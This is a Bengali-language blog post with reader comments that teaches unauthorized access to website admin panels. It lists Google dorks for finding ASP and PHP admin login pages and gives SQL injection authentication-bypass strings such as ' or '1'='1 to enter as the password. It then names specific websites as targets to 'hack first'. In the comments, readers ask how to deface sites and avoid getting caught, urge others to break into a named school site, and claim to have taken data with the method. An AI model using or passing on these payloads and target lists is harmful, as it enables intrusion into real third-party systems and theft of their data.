আজ দেখাব মাত্র ৫ মিনিটে কিভাবে
একটি ওয়েবসাইট হ্যাক করতে হয়। আমার মনে হয় আপনি এই নিয়মটা শিখার জন্য অনেক আগ্রহী হয়ে বসে আছে।আসুন শিখে ফেলি কিভাবে ৫ মিনিটে একটা
ওয়েবসাইট হ্যাকিং করতে হয়।
গুগল এ খুজলে আপনি হাজার হাজার vulnerable সাইট পাবেন ।
হ্যাকিং নিয়ে আরও অনেক কথা হবে । আমাদের টেকনোট্রিক বিডি এর সাথে থাকুন ।
কমেন্ট করতে আশা করি ভুলবেন না ।
সবাইকে ধন্যবাদ ।
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।
- প্রথমে আমরা যাব www.google.com এ।
- এবার Search বক্সে নিচের যে কোন একটি Google dork/sql injection লিখুন।
- আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
- এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
- যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
welcome to xxxxxxxxxx administrator panel
username :
password :
- এখানে ইউজার নেম দিনঃ Admin
- তাহলে পাসওয়ার্ড কি দিবেন ? নিচের থেকে যে কোন একটি দিন ।
- নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিনঃ
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
- তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin
password:'or'1'='1
- এবার submit এ ক্লিক করুন।
- ব্যস কাজ শেষ আপনি এখন ঐ সাইট এর এডমিন ।
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।
নিচে কিছু vulnerable সাইট দিলাম যাতে কষ্ট করে আপনাকে গুগল এ খুজতে না হয় । তাহলে নিচের সাইট গুলা আগে হ্যাক করুনঃ
www.sunmarytrust.org/adminlogin.asp
www.arcvns.com/admin.asp
www.amskrupajal.org/AdminLogin.asp
www.quickwrench.com/Admin/adminlogin.asp
www.adyar.net/Adminlogin.asp
www.ringjordan.com/AdminLogin.asp
www.preventivecardiology.in/adminlogin.asp
www.udesa.co.za/admin/login.asp
www.railgourmet.com/admin/admin-login.asp
www.arcvns.com/admin.asp
www.amskrupajal.org/AdminLogin.asp
www.quickwrench.com/Admin/adminlogin.asp
www.adyar.net/Adminlogin.asp
www.ringjordan.com/AdminLogin.asp
www.preventivecardiology.in/adminlogin.asp
www.udesa.co.za/admin/login.asp
www.railgourmet.com/admin/admin-login.asp
গুগল এ খুজলে আপনি হাজার হাজার vulnerable সাইট পাবেন ।
হ্যাকিং নিয়ে আরও অনেক কথা হবে । আমাদের টেকনোট্রিক বিডি এর সাথে থাকুন ।
কমেন্ট করতে আশা করি ভুলবেন না ।
সবাইকে ধন্যবাদ ।
চরম !!!!!
ReplyDeletevalo hai ni
ReplyDeleteKhub kharap laglo Amader BD-Railwar 2nong result a ache ...
ReplyDelete"inurl:admin.asp"
Darun post
eta te ki hobe
ReplyDeletehttp://cms.banglalion.com.bd/index.html
http://cms.banglalion.com.bd/index.html
ReplyDeleteনা এটা Vulnerable নয় ।
moja pai nai, voy paisi..................
ReplyDeletevai koi korta parlam na tooooooooooooooo
ReplyDeletevulnarabal bujhbo kmne?
ReplyDeleteAmar facebook hack hoicilo. Facebook kivabe protect korbo jodi bolen... R facebook hack kore kivabe...?
ReplyDeleteআপনার ফেসবুক অ্যাকাউন্ট হ্যাক হলে আপনার করনিওঃ
ReplyDeletehttp://technotrickbd.blogspot.com/2012/04/blog-post_30.html
Hi
Deleteহাসান ভাই হ্যাকিং নিয়ে আরও কিছু পোস্ট করেন ???
ReplyDelete..................
Deletenizee
ReplyDeleteইমেইল
DeleteDarun post...
ReplyDeletevai jara professional hacker hota chay, tader koronioo ki???????
site ar upor '' Haked'' kivabe likhbo......then oi site kivabe edit korbo..ta kintu bola hoy nai...
ReplyDeleteThanks for the post
ReplyDeletewww.kanadinstitute.org ki kore hobe???? admin pls pls amake help koro
ReplyDeletewell.
ReplyDeleteValo..
ReplyDeleteনিজে যাতে ধরা না খাই সেই জন্য নিজের নিরাপত্তার জন্য কি করতে হবে। রাবের সাইট হ্যাক করে সে কিন্তু ধরা খাইছিল।
ReplyDeleteএইটা কোনো কাম করলেন ভাই! :P
ReplyDeletevulnerable সাইট bujhbo kivabe
ReplyDeletevai j kono site er admin panel a toh dhuka jay but password kaj korena......How to break admin panel?..How to log in?..any other ways?..please help...
ReplyDeleteজটিল
ReplyDeletegreat thanks for sharing.
ReplyDeletevulnerable site kibabe sinbo
ReplyDeleteonek gula site theke data namalam ai method use kore.
ReplyDeleteThanks for your this post.
:)
Ato Soja Na Bro
ReplyDeletehttp://www.dariapuramanullahhs.edu.bd/admin
ReplyDeleteParle Ei ta hack kore username r pass din..ei ta vulnerable
ভুহ্ল
ReplyDeleteMahabul
ReplyDelete